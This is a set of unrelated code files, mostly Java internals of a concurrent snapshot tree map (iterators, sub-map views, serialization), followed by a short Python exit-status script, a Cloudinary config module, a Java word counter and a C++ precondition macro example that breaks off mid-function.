/** Live Set view of this map's entries.  All operations read from or write
 * through to the enclosing SnapTreeMap; iteration walks a frozen snapshot.
 */
private class EntrySet extends AbstractSet<Map.Entry<K,V>> {
    @Override
    public int size() {
        return SnapTreeMap.this.size();
    }
    @Override
    public boolean isEmpty() {
        return SnapTreeMap.this.isEmpty();
    }
    @Override
    public void clear() {
        SnapTreeMap.this.clear();
    }
    /** True iff the map contains exactly this key-value pair. */
    @Override
    public boolean contains(final Object o) {
        if (!(o instanceof Map.Entry<?,?>)) {
            return false;
        }
        final Object k = ((Map.Entry<?,?>)o).getKey();
        final Object v = ((Map.Entry<?,?>)o).getValue();
        final Object actualVo = SnapTreeMap.this.getImpl(k);
        if (actualVo == null) {
            // no associated value
            return false;
        }
        // getImpl returns the encoded form; decode before comparing
        final V actual = decodeNull(actualVo);
        return v == null ? actual == null : v.equals(actual);
    }
    /** Unconditionally stores the entry; true iff the mapping changed.
     * NOTE(review): the != is reference inequality against the freshly
     * encoded value -- presumably update returns the previous encoded
     * value, so identity implies no change; confirm against update().
     */
    @Override
    public boolean add(final Entry<K,V> e) {
        final Object v = encodeNull(e.getValue());
        return update(e.getKey(), UpdateAlways, null, v) != v;
    }
    /** Removes the pair only if both key and value match. */
    @Override
    public boolean remove(final Object o) {
        if (!(o instanceof Map.Entry<?,?>)) {
            return false;
        }
        final Object k = ((Map.Entry<?,?>)o).getKey();
        final Object v = ((Map.Entry<?,?>)o).getValue();
        return SnapTreeMap.this.remove(k, v);
    }
    @Override
    public Iterator<Entry<K,V>> iterator() {
        return new EntryIter<K,V>(SnapTreeMap.this);
    }
}
/** Iterator over Map.Entry values; the snapshot node itself is returned
 * as the entry (nextNode()'s result is used directly).
 */
private static class EntryIter<K,V> extends AbstractIter<K,V> implements Iterator<Map.Entry<K,V>> {
    /** Unbounded ascending iteration over a snapshot of m. */
    private EntryIter(final SnapTreeMap<K,V> m) {
        super(m);
    }
    /** Range-bounded iteration, optionally descending. */
    private EntryIter(final SnapTreeMap<K,V> m,
                      final Comparable<? super K> minCmp,
                      final boolean minIncl,
                      final Comparable<? super K> maxCmp,
                      final boolean maxIncl,
                      final boolean descending) {
        super(m, minCmp, minIncl, maxCmp, maxIncl, descending);
    }
    @Override
    public Entry<K,V> next() {
        return nextNode();
    }
}
/** Iterator over keys only; delegates traversal to AbstractIter and
 * projects out each node's key.
 */
private static class KeyIter<K,V> extends AbstractIter<K,V> implements Iterator<K> {
    /** Unbounded ascending iteration over a snapshot of m. */
    private KeyIter(final SnapTreeMap<K,V> m) {
        super(m);
    }
    /** Range-bounded iteration, optionally descending. */
    private KeyIter(final SnapTreeMap<K,V> m,
                    final Comparable<? super K> minCmp,
                    final boolean minIncl,
                    final Comparable<? super K> maxCmp,
                    final boolean maxIncl,
                    final boolean descending) {
        super(m, minCmp, minIncl, maxCmp, maxIncl, descending);
    }
    @Override
    public K next() {
        return nextNode().key;
    }
}
/** Common traversal machinery for key/entry iterators.  Iteration walks a
 * frozen snapshot of the tree using an explicit stack (path) of nodes from
 * the root down to the current node, so no locks are required and no
 * concurrent modification can be observed.  remove() writes through to the
 * live map.
 */
private static class AbstractIter<K,V> {
    private final SnapTreeMap<K,V> m;
    private final boolean descending;
    // traversal directions: forward is the iteration order, reverse its mirror
    private final char forward;
    private final char reverse;
    // explicit stack; path[depth-1] (top()) is the next node to return
    private Node<K,V>[] path;
    private int depth = 0;
    // last node returned by nextNode(), retained for remove()
    private Node<K,V> mostRecentNode;
    // key of the final node to return, or null for an unbounded iteration.
    // NOTE(review): advance() compares with == (reference identity) --
    // presumably safe because the key object comes from the same frozen
    // snapshot; confirm.
    private final K endKey;
    /** Unbounded ascending iteration over a snapshot of m. */
    @SuppressWarnings("unchecked")
    AbstractIter(final SnapTreeMap<K,V> m) {
        this.m = m;
        this.descending = false;
        this.forward = Right;
        this.reverse = Left;
        final Node<K,V> root = m.holderRef.frozen().right;
        // +3 gives slack beyond the snapshot's height for the stack
        this.path = (Node<K,V>[]) new Node[3 + height(root)];
        this.endKey = null;
        pushFirst(root);
    }
    /** Range-bounded iteration, optionally descending.  minCmp/maxCmp may
     * be null for an open bound.
     */
    @SuppressWarnings("unchecked")
    AbstractIter(final SnapTreeMap<K,V> m,
                 final Comparable<? super K> minCmp,
                 final boolean minIncl,
                 final Comparable<? super K> maxCmp,
                 final boolean maxIncl,
                 final boolean descending) {
        this.m = m;
        this.descending = descending;
        this.forward = !descending ? Right : Left;
        this.reverse = !descending ? Left : Right;
        // for a descending iteration the max bound is the starting point
        final Comparable<? super K> fromCmp;
        final boolean fromIncl = !descending ? minIncl : maxIncl;
        final Comparable<? super K> toCmp;
        final boolean toIncl = !descending ? maxIncl : minIncl;
        if (!descending) {
            fromCmp = minCmp;
            toCmp = maxCmp;
        } else {
            fromCmp = maxCmp;
            toCmp = minCmp;
        }
        final Node<K,V> root = m.holderRef.frozen().right;
        if (toCmp != null) {
            // resolve the terminal key up front so advance() can stop there
            this.endKey = (K) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, true, forward);
            if (this.endKey == null) {
                // no node satisfies the bound, nothing to iterate
                // (path stays null and depth 0, so hasNext() is false)
                // ---------> EARLY EXIT
                return;
            }
        } else {
            this.endKey = null;
        }
        this.path = (Node<K,V>[]) new Node[3 + height(root)];
        if (fromCmp == null) {
            pushFirst(root);
        }
        else {
            pushFirst(root, fromCmp, fromIncl);
            // the starting node may be a removed-but-not-unlinked entry
            if (depth > 0 && top().vOpt == null) {
                advance();
            }
        }
    }
    /** Compares in iteration order: negated for descending, with
     * Integer.MIN_VALUE mapped explicitly because -MIN_VALUE overflows.
     */
    private int cmp(final Comparable<? super K> comparable, final K key) {
        final int c = comparable.compareTo(key);
        if (!descending) {
            return c;
        } else {
            return c == Integer.MIN_VALUE ? 1 : -c;
        }
    }
    /** Pushes node and its chain of reverse-side descendants, positioning
     * top() at the first node in iteration order under node.
     */
    private void pushFirst(Node<K,V> node) {
        while (node != null) {
            path[depth++] = node;
            node = node.child(reverse);
        }
    }
    /** Like pushFirst(node), but skips everything before the from bound. */
    private void pushFirst(Node<K,V> node, final Comparable<? super K> fromCmp, final boolean fromIncl) {
        while (node != null) {
            final int c = cmp(fromCmp, node.key);
            if (c > 0 || (c == 0 && !fromIncl)) {
                // everything we're interested in is on the right
                node = node.child(forward);
            }
            else {
                path[depth++] = node;
                if (c == 0) {
                    // start the iteration here
                    return;
                }
                else {
                    node = node.child(reverse);
                }
            }
        }
    }
    private Node<K,V> top() {
        return path[depth - 1];
    }
    /** Moves top() to the next node (in iteration order) that carries a
     * value, or empties the stack when iteration is finished.
     */
    private void advance() {
        do {
            final Node<K,V> t = top();
            if (endKey != null && endKey == t.key) {
                // reached the precomputed terminal key: iteration is done
                depth = 0;
                path = null;
                return;
            }
            final Node<K,V> fwd = t.child(forward);
            if (fwd != null) {
                // successor is the leftmost (in iteration order) node of fwd
                pushFirst(fwd);
            } else {
                // pop until the popped node was not the forward child, i.e.
                // until we arrive at an ancestor from the reverse side
                Node<K,V> popped;
                do {
                    popped = path[--depth];
                } while (depth > 0 && popped == top().child(forward));
            }
            if (depth == 0) {
                // clear out the path so we don't pin too much stuff
                path = null;
                return;
            }
            // skip removed-but-not-unlinked entries
        } while (top().vOpt == null);
    }
    public boolean hasNext() {
        return depth > 0;
    }
    /** Returns the current node and advances; throws when exhausted. */
    Node<K,V> nextNode() {
        if (depth == 0) {
            throw new NoSuchElementException();
        }
        mostRecentNode = top();
        advance();
        return mostRecentNode;
    }
    /** Removes the last-returned key from the LIVE map; the snapshot being
     * iterated is unaffected.
     */
    public void remove() {
        if (mostRecentNode == null) {
            throw new IllegalStateException();
        }
        m.remove(mostRecentNode.key);
        mostRecentNode = null;
    }
}
//////////////// navigable keySet
/** Returns a live NavigableSet view of the keys; iteration uses a frozen
 * snapshot of this map.
 */
@Override
public NavigableSet<K> navigableKeySet() {
    return new KeySet<K>(this) {
        public Iterator<K> iterator() {
            return new KeyIter<K,V>(SnapTreeMap.this);
        }
    };
}
/** Returns a reverse-order NavigableSet view of the keys. */
@Override
public NavigableSet<K> descendingKeySet() {
    return descendingMap().navigableKeySet();
}
/** NavigableSet view over the keys of a backing ConcurrentNavigableMap.
 * Concrete subclasses supply {@link #iterator()}; every other operation
 * simply delegates to the backing map.
 */
private abstract static class KeySet<K> extends AbstractSet<K> implements NavigableSet<K> {

    /** The map whose key set this view mirrors. */
    private final ConcurrentNavigableMap<K,?> backing;

    protected KeySet(final ConcurrentNavigableMap<K,?> map) {
        this.backing = map;
    }

    //////// basic Set stuff

    @Override
    abstract public Iterator<K> iterator();

    @Override
    public boolean contains(final Object o) {
        return backing.containsKey(o);
    }

    @Override
    public boolean isEmpty() {
        return backing.isEmpty();
    }

    @Override
    public int size() {
        return backing.size();
    }

    @Override
    public boolean remove(final Object o) {
        return backing.remove(o) != null;
    }

    //////// SortedSet stuff

    @Override
    public Comparator<? super K> comparator() {
        return backing.comparator();
    }

    @Override
    public K first() {
        return backing.firstKey();
    }

    @Override
    public K last() {
        return backing.lastKey();
    }

    //////// NavigableSet stuff

    @Override
    public K lower(final K k) {
        return backing.lowerKey(k);
    }

    @Override
    public K floor(final K k) {
        return backing.floorKey(k);
    }

    @Override
    public K ceiling(final K k) {
        return backing.ceilingKey(k);
    }

    @Override
    public K higher(final K k) {
        return backing.higherKey(k);
    }

    @Override
    public K pollFirst() {
        return backing.pollFirstEntry().getKey();
    }

    @Override
    public K pollLast() {
        return backing.pollLastEntry().getKey();
    }

    @Override
    public NavigableSet<K> descendingSet() {
        return backing.descendingKeySet();
    }

    @Override
    public Iterator<K> descendingIterator() {
        return backing.descendingKeySet().iterator();
    }

    @Override
    public NavigableSet<K> subSet(final K fromElement, final boolean minInclusive, final K toElement, final boolean maxInclusive) {
        return backing.subMap(fromElement, minInclusive, toElement, maxInclusive).keySet();
    }

    @Override
    public NavigableSet<K> headSet(final K toElement, final boolean inclusive) {
        return backing.headMap(toElement, inclusive).keySet();
    }

    @Override
    public NavigableSet<K> tailSet(final K fromElement, final boolean inclusive) {
        return backing.tailMap(fromElement, inclusive).keySet();
    }

    @Override
    public SortedSet<K> subSet(final K fromElement, final K toElement) {
        return backing.subMap(fromElement, toElement).keySet();
    }

    @Override
    public SortedSet<K> headSet(final K toElement) {
        return backing.headMap(toElement).keySet();
    }

    @Override
    public SortedSet<K> tailSet(final K fromElement) {
        return backing.tailMap(fromElement).keySet();
    }
}
//////////////// NavigableMap views
/** Returns a live view of the portion of this map between fromKey and
 * toKey, with the given bound inclusivity.
 * @throws IllegalArgumentException if fromKey is greater than toKey
 */
@Override
public ConcurrentNavigableMap<K,V> subMap(final K fromKey,
                                          final boolean fromInclusive,
                                          final K toKey,
                                          final boolean toInclusive) {
    final Comparable<? super K> fromCmp = comparable(fromKey);
    if (fromCmp.compareTo(toKey) > 0) {
        // inverted ranges are disallowed, as in other NavigableMap impls
        throw new IllegalArgumentException();
    }
    return new SubMap<K,V>(this, fromKey, fromCmp, fromInclusive, toKey, comparable(toKey), toInclusive, false);
}
/** Returns a live view of the portion of this map below toKey. */
@Override
public ConcurrentNavigableMap<K,V> headMap(final K toKey, final boolean inclusive) {
    return new SubMap<K,V>(this, null, null, false, toKey, comparable(toKey), inclusive, false);
}
/** Returns a live view of the portion of this map above fromKey. */
@Override
public ConcurrentNavigableMap<K,V> tailMap(final K fromKey, final boolean inclusive) {
    return new SubMap<K,V>(this, fromKey, comparable(fromKey), inclusive, null, null, false, false);
}
/** Equivalent to {@code subMap(fromKey, true, toKey, false)}. */
@Override
public ConcurrentNavigableMap<K,V> subMap(final K fromKey, final K toKey) {
    return subMap(fromKey, true, toKey, false);
}
/** Equivalent to {@code headMap(toKey, false)}. */
@Override
public ConcurrentNavigableMap<K,V> headMap(final K toKey) {
    return headMap(toKey, false);
}
/** Equivalent to {@code tailMap(fromKey, true)}. */
@Override
public ConcurrentNavigableMap<K,V> tailMap(final K fromKey) {
    return tailMap(fromKey, true);
}
/** Returns an unbounded reverse-order view of this map; only the
 * navigation and iteration order is flipped.
 */
@Override
public ConcurrentNavigableMap<K,V> descendingMap() {
    // parameterized construction (was a raw 'new SubMap(...)', which
    // produced an unchecked-conversion warning and dropped the K,V typing)
    return new SubMap<K,V>(this, null, null, false, null, null, false, true);
}
/** A live, range-restricted (and possibly reverse-ordered) view of a
 * SnapTreeMap.  All reads and writes delegate to the underlying map after
 * bound checks; when {@code descending} is true the min/max roles are
 * swapped for every navigation operation.  The min/max bounds are stored
 * both as keys (serializable) and as Comparables (transient, rebuilt on
 * deserialization).
 */
private static class SubMap<K,V> extends AbstractMap<K,V> implements ConcurrentNavigableMap<K,V>, Serializable {
    private static final long serialVersionUID = -7388140285999372919L;
    private final SnapTreeMap<K,V> m;
    // null minKey/minCmp means the view is unbounded below (mirrored for max)
    private final K minKey;
    private transient Comparable<? super K> minCmp;
    private final boolean minIncl;
    private final K maxKey;
    private transient Comparable<? super K> maxCmp;
    private final boolean maxIncl;
    private final boolean descending;
    private SubMap(final SnapTreeMap<K,V> m,
                   final K minKey,
                   final Comparable<? super K> minCmp,
                   final boolean minIncl,
                   final K maxKey,
                   final Comparable<? super K> maxCmp,
                   final boolean maxIncl,
                   final boolean descending) {
        this.m = m;
        this.minKey = minKey;
        this.minCmp = minCmp;
        this.minIncl = minIncl;
        this.maxKey = maxKey;
        this.maxCmp = maxCmp;
        this.maxIncl = maxIncl;
        this.descending = descending;
    }
    // TODO: clone
    /** True iff key falls below this view's lower bound. */
    private boolean tooLow(final K key) {
        if (minCmp == null) {
            return false;
        } else {
            final int c = minCmp.compareTo(key);
            return c > 0 || (c == 0 && !minIncl);
        }
    }
    /** True iff key falls above this view's upper bound. */
    private boolean tooHigh(final K key) {
        if (maxCmp == null) {
            return false;
        } else {
            final int c = maxCmp.compareTo(key);
            return c < 0 || (c == 0 && !maxIncl);
        }
    }
    private boolean inRange(final K key) {
        return !tooLow(key) && !tooHigh(key);
    }
    /** Rejects null keys and keys outside this view's bounds. */
    private void requireInRange(final K key) {
        if (key == null) {
            throw new NullPointerException();
        }
        if (!inRange(key)) {
            throw new IllegalArgumentException();
        }
    }
    /** Direction of this view's logical first element. */
    private char minDir() {
        return descending ? Right : Left;
    }
    /** Direction of this view's logical last element. */
    private char maxDir() {
        return descending ? Left : Right;
    }
    //////// AbstractMap
    @Override
    public boolean isEmpty() {
        // empty iff no extreme exists within the bounds
        return m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, true, Left) == null;
    }
    @Override
    public int size() {
        // computed over a frozen snapshot so the count is consistent
        final Node<K,V> root = m.holderRef.frozen().right;
        return Node.computeFrozenSize(root, minCmp, minIncl, maxCmp, maxIncl);
    }
    @Override
    @SuppressWarnings("unchecked")
    public boolean containsKey(final Object key) {
        if (key == null) {
            throw new NullPointerException();
        }
        final K k = (K) key;
        return inRange(k) && m.containsKey(k);
    }
    @Override
    public boolean containsValue(final Object value) {
        // apply the same null policy as the rest of the code, but fall
        // back to the default implementation
        encodeNull(value);
        return super.containsValue(value);
    }
    @Override
    @SuppressWarnings("unchecked")
    public V get(final Object key) {
        if (key == null) {
            throw new NullPointerException();
        }
        final K k = (K) key;
        return !inRange(k) ? null : m.get(k);
    }
    @Override
    public V put(final K key, final V value) {
        requireInRange(key);
        return m.put(key, value);
    }
    @Override
    @SuppressWarnings("unchecked")
    public V remove(final Object key) {
        if (key == null) {
            throw new NullPointerException();
        }
        // out-of-range keys are simply absent from this view
        return !inRange((K) key) ? null : m.remove(key);
    }
    @Override
    public Set<Entry<K,V>> entrySet() {
        return new EntrySubSet();
    }
    /** Entry-set view restricted to this SubMap's bounds. */
    private class EntrySubSet extends AbstractSet<Map.Entry<K,V>> {
        @Override
        public int size() {
            return SubMap.this.size();
        }
        @Override
        public boolean isEmpty() {
            return SubMap.this.isEmpty();
        }
        @SuppressWarnings("unchecked")
        @Override
        public boolean contains(final Object o) {
            if (!(o instanceof Map.Entry<?,?>)) {
                return false;
            }
            final Object k = ((Map.Entry<?,?>)o).getKey();
            if (!inRange((K) k)) {
                return false;
            }
            final Object v = ((Map.Entry<?,?>)o).getValue();
            final Object actualVo = m.getImpl(k);
            if (actualVo == null) {
                // no associated value
                return false;
            }
            final V actual = m.decodeNull(actualVo);
            return v == null ? actual == null : v.equals(actual);
        }
        /** Stores the entry (bounds-checked); true iff the mapping changed. */
        @Override
        public boolean add(final Entry<K,V> e) {
            requireInRange(e.getKey());
            final Object v = encodeNull(e.getValue());
            return m.update(e.getKey(), UpdateAlways, null, v) != v;
        }
        @Override
        public boolean remove(final Object o) {
            if (!(o instanceof Map.Entry<?,?>)) {
                return false;
            }
            final Object k = ((Map.Entry<?,?>)o).getKey();
            final Object v = ((Map.Entry<?,?>)o).getValue();
            return SubMap.this.remove(k, v);
        }
        @Override
        public Iterator<Entry<K,V>> iterator() {
            return new EntryIter<K,V>(m, minCmp, minIncl, maxCmp, maxIncl, descending);
        }
    }
    //////// SortedMap
    @Override
    public Comparator<? super K> comparator() {
        final Comparator<? super K> fromM = m.comparator();
        if (descending) {
            return Collections.reverseOrder(fromM);
        } else {
            return fromM;
        }
    }
    @Override
    public K firstKey() {
        return m.boundedExtremeKeyOrThrow(minCmp, minIncl, maxCmp, maxIncl, minDir());
    }
    @Override
    public K lastKey() {
        return m.boundedExtremeKeyOrThrow(minCmp, minIncl, maxCmp, maxIncl, maxDir());
    }
    //////// NavigableMap
    @SuppressWarnings("unchecked")
    private K firstKeyOrNull() {
        return (K) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, true, minDir());
    }
    @SuppressWarnings("unchecked")
    private K lastKeyOrNull() {
        return (K) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, true, maxDir());
    }
    @SuppressWarnings("unchecked")
    private Entry<K,V> firstEntryOrNull() {
        return (Entry<K,V>) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, false, minDir());
    }
    @SuppressWarnings("unchecked")
    private Entry<K,V> lastEntryOrNull() {
        return (Entry<K,V>) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, false, maxDir());
    }
    // For the lower/floor/ceiling/higher family: "lower" is relative to this
    // view's order, so when descending the tooLow/tooHigh roles swap.  If
    // the probe key is beyond the far bound we can search this whole view;
    // otherwise we narrow to a sub-view ending just before/at the key.
    @Override
    public Entry<K,V> lowerEntry(final K key) {
        if (key == null) {
            throw new NullPointerException();
        }
        if (!descending ? tooLow(key) : tooHigh(key)) {
            return null;
        }
        return ((!descending ? tooHigh(key) : tooLow(key))
                ? this : subMapInRange(null, false, key, false)).lastEntryOrNull();
    }
    @Override
    public K lowerKey(final K key) {
        if (key == null) {
            throw new NullPointerException();
        }
        if (!descending ? tooLow(key) : tooHigh(key)) {
            return null;
        }
        return ((!descending ? tooHigh(key) : tooLow(key))
                ? this : subMapInRange(null, false, key, false)).lastKeyOrNull();
    }
    @Override
    public Entry<K,V> floorEntry(final K key) {
        if (key == null) {
            throw new NullPointerException();
        }
        if (!descending ? tooLow(key) : tooHigh(key)) {
            return null;
        }
        return ((!descending ? tooHigh(key) : tooLow(key))
                ? this : subMapInRange(null, false, key, true)).lastEntryOrNull();
    }
    @Override
    public K floorKey(final K key) {
        if (key == null) {
            throw new NullPointerException();
        }
        if (!descending ? tooLow(key) : tooHigh(key)) {
            return null;
        }
        return ((!descending ? tooHigh(key) : tooLow(key))
                ? this : subMapInRange(null, false, key, true)).lastKeyOrNull();
    }
    @Override
    public Entry<K,V> ceilingEntry(final K key) {
        if (key == null) {
            throw new NullPointerException();
        }
        if (!descending ? tooHigh(key) : tooLow(key)) {
            return null;
        }
        return ((!descending ? tooLow(key) : tooHigh(key))
                ? this : subMapInRange(key, true, null, false)).firstEntryOrNull();
    }
    @Override
    public K ceilingKey(final K key) {
        if (key == null) {
            throw new NullPointerException();
        }
        if (!descending ? tooHigh(key) : tooLow(key)) {
            return null;
        }
        return ((!descending ? tooLow(key) : tooHigh(key))
                ? this : subMapInRange(key, true, null, false)).firstKeyOrNull();
    }
    @Override
    public Entry<K,V> higherEntry(final K key) {
        if (key == null) {
            throw new NullPointerException();
        }
        if (!descending ? tooHigh(key) : tooLow(key)) {
            return null;
        }
        return ((!descending ? tooLow(key) : tooHigh(key))
                ? this : subMapInRange(key, false, null, false)).firstEntryOrNull();
    }
    @Override
    public K higherKey(final K key) {
        if (key == null) {
            throw new NullPointerException();
        }
        if (!descending ? tooHigh(key) : tooLow(key)) {
            return null;
        }
        return ((!descending ? tooLow(key) : tooHigh(key))
                ? this : subMapInRange(key, false, null, false)).firstKeyOrNull();
    }
    @Override
    @SuppressWarnings("unchecked")
    public Entry<K,V> firstEntry() {
        return (Entry<K,V>) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, false, minDir());
    }
    @Override
    @SuppressWarnings("unchecked")
    public Entry<K,V> lastEntry() {
        return (Entry<K,V>) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, false, maxDir());
    }
    @Override
    @SuppressWarnings("unchecked")
    public Entry<K,V> pollFirstEntry() {
        // snapshot-then-conditionally-remove loop: retry if another thread
        // changed the mapping between the read and the remove
        while (true) {
            final Entry<K,V> snapshot = (Entry<K,V>) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, false, minDir());
            if (snapshot == null || m.remove(snapshot.getKey(), snapshot.getValue())) {
                return snapshot;
            }
        }
    }
    @Override
    @SuppressWarnings("unchecked")
    public Entry<K,V> pollLastEntry() {
        while (true) {
            final Entry<K,V> snapshot = (Entry<K,V>) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, false, maxDir());
            if (snapshot == null || m.remove(snapshot.getKey(), snapshot.getValue())) {
                return snapshot;
            }
        }
    }
    //////// ConcurrentMap
    @Override
    public V putIfAbsent(final K key, final V value) {
        requireInRange(key);
        return m.putIfAbsent(key, value);
    }
    @Override
    @SuppressWarnings("unchecked")
    public boolean remove(final Object key, final Object value) {
        return inRange((K) key) && m.remove(key, value);
    }
    @Override
    public boolean replace(final K key, final V oldValue, final V newValue) {
        requireInRange(key);
        return m.replace(key, oldValue, newValue);
    }
    @Override
    public V replace(final K key, final V value) {
        requireInRange(key);
        return m.replace(key, value);
    }
    //////// ConcurrentNavigableMap
    @Override
    public SubMap<K,V> subMap(final K fromKey,
                              final boolean fromInclusive,
                              final K toKey,
                              final boolean toInclusive) {
        if (fromKey == null || toKey == null) {
            throw new NullPointerException();
        }
        return subMapImpl(fromKey, fromInclusive, toKey, toInclusive);
    }
    @Override
    public SubMap<K,V> headMap(final K toKey, final boolean inclusive) {
        if (toKey == null) {
            throw new NullPointerException();
        }
        return subMapImpl(null, false, toKey, inclusive);
    }
    @Override
    public SubMap<K,V> tailMap(final K fromKey, final boolean inclusive) {
        if (fromKey == null) {
            throw new NullPointerException();
        }
        return subMapImpl(fromKey, inclusive, null, false);
    }
    @Override
    public SubMap<K,V> subMap(final K fromKey, final K toKey) {
        return subMap(fromKey, true, toKey, false);
    }
    @Override
    public SubMap<K,V> headMap(final K toKey) {
        return headMap(toKey, false);
    }
    @Override
    public SubMap<K,V> tailMap(final K fromKey) {
        return tailMap(fromKey, true);
    }
    /** Validates the requested bounds against this view before narrowing. */
    private SubMap<K,V> subMapImpl(final K fromKey,
                                   final boolean fromIncl,
                                   final K toKey,
                                   final boolean toIncl) {
        if (fromKey != null) {
            requireInRange(fromKey);
        }
        if (toKey != null) {
            requireInRange(toKey);
        }
        return subMapInRange(fromKey, fromIncl, toKey, toIncl);
    }
    /** Builds a narrowed SubMap; from/to are in this view's order, so for
     * a descending view they map onto the max/min bounds respectively.
     */
    private SubMap<K,V> subMapInRange(final K fromKey,
                                      final boolean fromIncl,
                                      final K toKey,
                                      final boolean toIncl) {
        final Comparable<? super K> fromCmp = fromKey == null ? null : m.comparable(fromKey);
        final Comparable<? super K> toCmp = toKey == null ? null : m.comparable(toKey);
        if (fromKey != null && toKey != null) {
            final int c = fromCmp.compareTo(toKey);
            if ((!descending ? c > 0 : c < 0)) {
                throw new IllegalArgumentException();
            }
        }
        K minK = minKey;
        Comparable<? super K> minC = minCmp;
        boolean minI = minIncl;
        K maxK = maxKey;
        Comparable<? super K> maxC = maxCmp;
        boolean maxI = maxIncl;
        if (fromKey != null) {
            if (!descending) {
                minK = fromKey;
                minC = fromCmp;
                minI = fromIncl;
            } else {
                maxK = fromKey;
                maxC = fromCmp;
                maxI = fromIncl;
            }
        }
        if (toKey != null) {
            if (!descending) {
                maxK = toKey;
                maxC = toCmp;
                maxI = toIncl;
            } else {
                minK = toKey;
                minC = toCmp;
                minI = toIncl;
            }
        }
        // parameterized construction (was a raw 'new SubMap(...)', which
        // produced an unchecked-conversion warning)
        return new SubMap<K,V>(m, minK, minC, minI, maxK, maxC, maxI, descending);
    }
    @Override
    public SubMap<K,V> descendingMap() {
        return new SubMap<K,V>(m, minKey, minCmp, minIncl, maxKey, maxCmp, maxIncl, !descending);
    }
    @Override
    public NavigableSet<K> keySet() {
        return navigableKeySet();
    }
    @Override
    public NavigableSet<K> navigableKeySet() {
        return new KeySet<K>(SubMap.this) {
            public Iterator<K> iterator() {
                return new KeyIter<K,V>(m, minCmp, minIncl, maxCmp, maxIncl, descending);
            }
        };
    }
    @Override
    public NavigableSet<K> descendingKeySet() {
        return descendingMap().navigableKeySet();
    }
    //////// Serialization
    /** Rebuilds the transient Comparable bounds from the serialized keys. */
    private void readObject(final ObjectInputStream xi) throws IOException, ClassNotFoundException {
        xi.defaultReadObject();
        minCmp = minKey == null ? null : m.comparable(minKey);
        maxCmp = maxKey == null ? null : m.comparable(maxKey);
    }
}
//////// Serialization
/** Saves the state of the <code>SnapTreeMap</code> to a stream: default
 * fields first, then the entry count, then the key/value pairs in sorted
 * order (written by writeEntry).
 */
@SuppressWarnings("unchecked")
private void writeObject(final ObjectOutputStream xo) throws IOException {
    // this handles the comparator, and any subclass stuff
    xo.defaultWriteObject();
    // by cloning the COWMgr, we get a frozen tree plus the size
    final COWMgr<K,V> h = (COWMgr<K,V>) holderRef.clone();
    // count first, so readObject knows how many pairs follow
    xo.writeInt(h.size());
    writeEntry(xo, h.frozen().right);
}
/** Recursively writes the key/value pairs of the subtree rooted at node
 * in in-order (sorted) order, skipping valueless routing nodes
 * (vOpt == null).  Values are decoded from their null-encoded form.
 */
private void writeEntry(final ObjectOutputStream xo, final Node<K,V> node) throws IOException {
    if (node != null) {
        writeEntry(xo, node.left);
        if (node.vOpt != null) {
            xo.writeObject(node.key);
            xo.writeObject(decodeNull(node.vOpt));
        }
        writeEntry(xo, node.right);
    }
}
/** Reverses {@link #writeObject(ObjectOutputStream)}: reads the default
 * fields, the entry count, then that many key/value pairs, inserting each
 * into a fresh private root before publishing it via a new COWMgr.
 */
private void readObject(final ObjectInputStream xi) throws IOException, ClassNotFoundException {
    xi.defaultReadObject();
    final int size = xi.readInt();
    // TODO: take advantage of the sort order
    // for now we optimize only by bypassing the COWMgr
    final RootHolder<K,V> holder = new RootHolder<K,V>();
    for (int i = 0; i < size; ++i) {
        final K k = (K) xi.readObject();
        final V v = (V) xi.readObject();
        // insert directly under the private holder; no other thread can
        // see it until holderRef is assigned below
        updateUnderRoot(k, comparable(k), UpdateAlways, null, encodeNull(v), holder);
    }
    holderRef = new COWMgr<K,V>(holder, size);
}
}
|
import sys
import time

# Emit two progress lines on stdout, pausing a second between them.
for index in range(2):
    print("result %d" % index)
    time.sleep(1)

# Signal failure: a diagnostic on stderr plus a non-zero exit status.
print("foobar!", file=sys.stderr)
sys.exit(1)
|
import cloudinary from 'cloudinary'

// Work with the v2 namespace of the SDK.
const { v2: cloudinaryV2 } = cloudinary

// Credentials come from the environment so nothing is committed to source.
cloudinaryV2.config({
  cloud_name: process.env.CLOUD_NAME,
  api_key: process.env.API_KEY,
  api_secret: process.env.API_SECRET,
})

export default cloudinaryV2
|
public class WordCounter {
    /** Counts the space-separated words in {@code str}.
     * A "word" is a maximal run of non-space characters; only the space
     * character (' ') is treated as a separator, matching the original
     * behavior (tabs/newlines are part of words).
     *
     * Rewritten as a single scan tracking whether the previous character
     * was a space; the original copied the whole string into a char[]
     * (needless O(n) extra memory) and used a convoluted word-start test.
     *
     * @param str the string to scan (must be non-null)
     * @return the number of words; 0 for an empty or all-space string
     */
    public static int countWords(String str)
    {
        int count = 0;
        boolean prevWasSpace = true;  // virtual space before index 0
        for (int i = 0; i < str.length(); i++) {
            final char c = str.charAt(i);
            // a word starts at each non-space that follows a space
            if (c != ' ' && prevWasSpace) {
                count++;
            }
            prevWasSpace = (c == ' ');
        }
        return count;
    }

    public static void main(String[] args)
    {
        String str = "This is an example";
        System.out.println(countWords(str));
    }
}
#include <iostream>
#include <stdexcept>
// Throws std::runtime_error naming the failed expression when `condition`
// is false. The do/while(0) wrapper makes the macro expand to a single
// statement (safe in unbraced if/else); #condition stringizes the check.
#define CUSTOM_PRE_CONDITION(condition) \
do { \
if (!(condition)) { \
throw std::runtime_error("Pre-condition failed: " #condition); \
} \
} while (0)
// Usage example
// Validates all arguments via CUSTOM_PRE_CONDITION before doing any work,
// so a bad argument surfaces as a std::runtime_error naming the check.
// NOTE(review): `Type` and `ComponentUsage` are not declared in this file —
// presumably enums with NbTypes/NbUsages sentinels; confirm at their
// definitions.
void someFunction(int nbComponents, Type formatType, ComponentUsage componentUsage)
{
    CUSTOM_PRE_CONDITION(nbComponents > 0);
    CUSTOM_PRE_CONDITION(formatType < Type::NbTypes);
    CUSTOM_PRE_CONDITION(componentUsage < ComponentUsage::NbUsages);
    // Function body
    std::cout << "Function executed successfully!" << std::endl;
}
// Demonstrates the pre-condition macro: a failed check inside
// someFunction surfaces as std::runtime_error and is reported here.
int main()
{
    try {
